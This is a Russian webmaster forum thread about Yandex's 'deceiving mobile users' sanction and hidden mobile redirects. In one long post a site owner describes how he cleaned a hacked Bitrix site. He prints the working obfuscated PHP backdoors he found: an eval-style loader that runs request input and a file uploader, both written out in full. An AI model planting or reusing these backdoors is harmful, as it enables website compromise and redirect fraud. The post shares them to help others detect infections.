Обман пользователей мобильного интернета

NesteA88
На сайте с 24.01.2017
Offline
30
#31
Подскажите, пожалуйста, ничего не меняли в итоге на самом сайте? Осталась реклама РСЯ и Адсенс?

На сайте ничего не менял. Рекламу тоже не трогал. Переписка со службой поддержки результата не дала. Просто нажал кнопку.

NesteA88
На сайте с 24.01.2017
Offline
30
#32

Доброго времени суток!

Вновь на сайт наложен данный фильтр - Обман пользователей мобильного интернета.

При первом обращении в ответ пришло шаблонное письмо. Попросил прислать конкретные страницы, где происходит перенаправление на платные услуги.

Ответ Платона:

Перенаправления происходили, например, с этой страницы вашего сайта: https://armymusic.ru/K/43-korenyugin-aleksandr/54-sanya-1/774-pod-sapogami-mnetsya-gryaz.html на следующие хосты:

  • inductrhdg.pt
  • wpclk.net
  • muzvolna.beeline.ru
  • cdp.beeline.ru

Как это можно проверить? И как увидеть эти редиректы своими глазами?

Anamnado
На сайте с 08.02.2010
Offline
239
#33

у вас очень долгая подгрузка контента идет

я это воспринял как грабер с других сайтов  (для родного сервера дюжа  долгий процесс)

конечно я могу ошибаться!  Но -  в любом случае только вы можете знать что там в этой подгрузке происходит 

НО если это грабер  и есть  большая вероятность что код  редиректа то не у вас на сайте........  

Подпись без рабочей ссылки все равно, что коитус без кульминации ((c) Anadonam)
tommy-gung
На сайте с 22.11.2006
Offline
260
#34
NesteA88 #:

Как это можно проверить? И как увидеть эти редиректы своими глазами?

зайти с билайна на сайт. в адсенсе 100% крутится реклама подписок
Здесь не могла быть ваша реклама
LEOnidUKG
На сайте с 25.11.2006
Offline
1551
#35
Забить на это. Тупые программисты не понимают, что эти проблемы в основном на клиентской части, а не на самом сайте. Но этому фильтру уже лет 5. Поэтому просто жить с этим. Он у меня тоже, то появляется, то исчезает.
✅ Трастовых площадок под размещение статей и ссылок. Опыт 12 лет! ( https://searchengines.guru/ru/forum/675690 ) ⭐ Купить вечные трастовые ссылки для сайта ( https://getmanylinks.ru/?srh ) ⭐ Ускорение ваших сайтов (WP, Opencart и др.) + Настройка сервера ( https://searchengines.guru/ru/forum/997205 )
И
На сайте с 22.01.2016
Offline
45
#36
И мне вчера прилетела такая метка, траф соответственно просел. Если и есть такая проблема на сайте, то думаю, что адсенс или рся в своей рекламе перекидывают на подписки, а как бороться с этим непонятно.
A
На сайте с 14.09.2020
Offline
0
#37

Сразу извиняюсь за много букв, но думаю это будет полезно многим в поисках....

Слушайте и держитесь! Возможно кому-то помогу в поиске проблемы и отлова этих редиректов. Сам борюсь уже с июня этого года. В начале так же ничего не понимал куда копать и где искать...

Так же писал в поддержку яндекса и так же отвечали. Забегая вперед нашел вредный код, удалил и ограничения снимали примерно недели через 2 после нажатия на кнопку "Исправил", но через какое-то время код вновь появлялся и санкции вновь накладывались от яндекса... уже в 3-й раз жду снятия санкций.......

Итак по порядку: реально своими глазами можно увидеть редирект (но не всегда срабатывает) только при использовании мобильного интернета (через WiFi не работает). Так же нужно полностью очистить всю историю (я для этого использовал встроенный браузер андройда).

Где нашел сам редирект: в битриксе в первой строке header.php, этот файл грузится на всех страницах сайта. На вашей системе ищите где может быть.... (причем на локальной копии (с которой работаю) все было норм - изменения произошли на сервере - это я так сразу исключил какой-то вирус у себя..... По времени изменения файла по логам уже было не отследить как и кто его изменил...

Далее через неделю строка появилась снова, и стал смотреть логи... И как вычислил по логам, где-то в глубине был закопан php скрипт, который (как я полагаю) запускался в ручную (точнее там даже форма в которую что-то вводится и которая что-то делает далее). PHP Код очень хитроумный и фильтрами его сложно отловить - все функции собираются из огромного словаря символов.. вот пример кода который уже обрабатывал форму:

if (isset($_POST['d42'])) $sddas = "*".$_POST['d42'].'*'."\r\n";

$f12='b'.$U.$T.$S.'64'.$J.'d'.$S.$R.'od'.$S;

$f23=$T.'t'.$M.$J.$M.$S.'p'.$A.$U.$R.$S;

$f37=$T.$S.'t'.$R.'ooki'.$S;

$f43='gzinf'.$A.$U.'t'.$S;

$f50=$R.$M.$S.$U.'t'.$S.$J.'fun'.$R.'tion';

$f60='mb'.$J.$T.'ub'.$T.'t'.$M;

$f78='mb'.$J.$T.'t'.$M.$A.$S.'n';

$f88='md5';

$f95=$T.'h'.$U.'1';

$f104='o'.$M.'d';

$f115=$R.'h'.$M;

далее идет огромный словарь символов и пара маленьких функций с циклами перебора этих словарей, а итоговая собранная функция запускалась просто: $k27(); Это по сути текстовая переменная с функцией... И в приведенном примере вы можете в одной переменной собрать "create_function"..

ну в общем я отключил все это дело, поставил контрольки, что бы мне пришло сообщение что пытаются запустить скрипт... ждать пришлось чуть менее недели... пытались запустить скрипт раз 15.. и по логам это тоже было видно.. проверил кода с редиректом не появилось ну думаю на этом все успокоится.. через часа 4 еще раз 10 пытались запустить и на этом все успокоилось... яндекс разбанил и жизнь вроде как наладилась.... но тут опять прилетел бан, опять этот редирект в хидере.. по логам нашел еще такой же файл, но в другом месте... И слушайте, думал вычислить когда он появился, но не тут-то было - фал был создан аж 2015 году - в аккурат когда и соседние фалы в этой папке.... Т.е. оп дате изменения искать не реально.

Все мои мысли как поиском вычислить всю эту заразу я так и не придумал...  все функции в скриптах собираются из словарей и потом уже собираются... По ftp логам (за большой период времени) я тоже не смог найти, что бы что-то загружалось похожее, все мои загрузки только.... Поэтому вероятно фалы создавались прямо на сайте и дата изменялась (так исключил загрузку из админки битрикса и загрузку по ftp)...

В общем я нашел на сайте порядка 10 разных фалов подобного содержания. Искал исключительно сравнивая резервную копию сайта очень старой и текущей версии....

И так еще несколько наводящего, что можно искать:

1. несколько фалов (в разных местах) были с именем git.php

2. Так же встретились файлы: jquery.php, css.php, mbstring.php, json.php, plugins.php, components.php - вроде в начале на такие и не обратишь внимание, если не расширение.... Все файлы либо словари, либо что-то вроде  строк "\152\x61\x76\141\137\163\x65\163\163\x69\x6f\x6e\137" и создание классов.....

3. Еще фалик с именем "autoload.php" с содержимым: <?php

$TEYFW = "\142\141\163\145" . 576 / 9 . "\137\x64\x65" . "\143\x6f\144\x65"; $mki6B = $TEYFW("\131\63\112\x6c\x59\x58\x52\154\130\62\x5a\61\142\x6d\116\60\x61\x57\x39\165"); if ($rwWwl = $mki6B('', "\162\x65\164\165\162\156\40" . @$_REQUEST["\x61\152\x61\170\137\152\161\165\x65\162\171\137\x31\60"] . "\73")()) { print "\x3c\160\x72\145\x3e"; print_r($rwWwl); }?>

4. Один из "git.php" был с содержимым :<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" enctype="Multipart/Form-Data">
<input type="file" name="ajax">
<p>
<input type="submit" value="Download">
</form>
<?php 
$jquery='base'.(576/9).'_de'.'code';$jquery=$jquery("bW92ZV91cGxvYWRlZF9maWxl");
$ajax1 = $jquery;
if( isset($_FILES['ajax']['name']) and ($_FILES['ajax']['name'] == 'mysql_pdo.php') )
$ajax1 (( $_FILES['ajax']['tmp_name']), ('./'.$_FILES['ajax']['name']));

?>

Я так понимаю с помощью него загружались нужные фалы.....


Короче резюмируя - поиском найти сложно, единственное искать по регулярке функции (точнее переменную со скобками) с именем похожим на "$f34()" - буква может быть любой и цифр может другое количество. но этим все не отловите - так я нашел только 2 фала.

Функцию PHP touch искать бесполезно - не нашел ни одного файла. По кускам словарей так же искать бесполезно....

Идеально если у вас есть старая резервная копия и по ней сравнивать с текущей и вычислять измененные файлы.

SV
На сайте с 03.11.2008
Offline
1385
#38
asmalexey #:
Сразу извиняюсь за много букв, но думаю это будет полезно многим в поисках....
Мог бы просто написать - "дыра на сайте" и всех делов.
Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Топики помощи с ⓌordPress (https://searchengines.guru/ru/forum/1032910 ) и основы безопасности сайтов ( https://searchengines.guru/ru/forum/774117 ). *** Помощь\консультации в топиках форума - БЕСПЛАТНО. Платные услуги ( https://wp.me/P3YHjQ-3 ) - с бюджетом от 150$ ***
A
На сайте с 14.09.2020
Offline
0
#39
SeVlad #:
Мог бы просто написать - "дыра на сайте" и всех делов.

Ну видимо у многих "дыра на сайте" и эти многие не подозревают об этом, раз это тема возникла, а я просто пытаюсь помочь людям в поиске, а не просто сидеть и давить на кнопку "Я все исправил"...

SV
На сайте с 03.11.2008
Offline
1385
#40
asmalexey #:
Ну видимо у многих "дыра на сайте" и эти многие не подозревают об этом,

1. Диагноз "Обман пользователей мобильного интернета" совершено не обязательно связан с дырой на сайте. Других причин гораздо больше (и тут  них писали).

2. Непонятно зачем ты всё это тут расписывал. Избавление от дыр - сугубо личная процедура и для этого есть целый раздел на сёрче.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий